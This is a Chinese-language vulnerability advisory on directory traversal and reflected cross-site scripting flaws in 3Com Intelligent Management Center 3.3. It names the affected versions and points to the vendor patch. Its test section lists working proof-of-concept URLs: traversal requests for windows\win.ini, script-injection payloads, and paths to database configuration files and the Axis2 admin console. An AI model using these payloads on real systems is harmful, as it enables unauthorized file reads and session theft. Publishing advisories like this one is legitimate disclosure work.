发布日期：2010-05-20
更新日期：2010-05-21

受影响系统：

3Com Intelligent Management Center 3.3.9 R2 606
3Com Intelligent Management Center 3.3 SP1 R2 606

不受影响系统：

3Com Intelligent Management Center 3.3 SP2 R2 606

描述：

---

BUGTRAQ  ID: 40298

3Com Intelligent Management Center（IMC）是企业级的综合管理解决方案。

IMC管理控制台的报表功能中存在目录遍历攻击，未经认证的用户可以通过提交恶意请求从webroot外的指定位置检索文件；此外IMC的多个页面（包括登录页面）中存在反射式跨站脚本漏洞，用户受骗跟随了恶意链接就会导致在浏览器会话中执行任意代码或泄漏敏感信息

<*来源：Richard Brain
  
  链接：http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-01
        http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-02
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com:8080/imc/report/DownloadReportSource?dirType=webapp&amp;fileDir=reports&amp;fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://www.example.com:8080/imc/report/DownloadReportSource?dirType=webapp&amp;fileDir=reports..\..\..\..\..\..\..\..\windows\win.ini%00reports&amp;fileName=reportParaExample.xml
http://www.example.com:8080/imc/login.jsf?loginForm%3a_link_hidden_=&amp;javax.faces.ViewState=%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com:8080/imc/dwr/call/plaincall/blah?callCount=&lt;script&gt;alert(1)&lt;/script&gt;
http://www.example.com:8080/imc/dwr/interface/&lt;script&gt;alert(1)&lt;/script&gt;
http://www.example.com:8080/imc/reportscript/sqlserver/deploypara.properties
http://www.example.com:8080/rpt/reportscript/sqlserver/deploypara.properties
http://www.example.com:8080/imc/reportscript/oracle/deploypara.properties
http://www.example.com:8080/imcws/
http://www.example.com:8080/imcws/services/listServices
http://www.example.com:8080/imcws/axis2-admin/

建议：

---

厂商补丁：

3Com
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.3com.com

浏览次数：2012
严重程度：0（网友投票）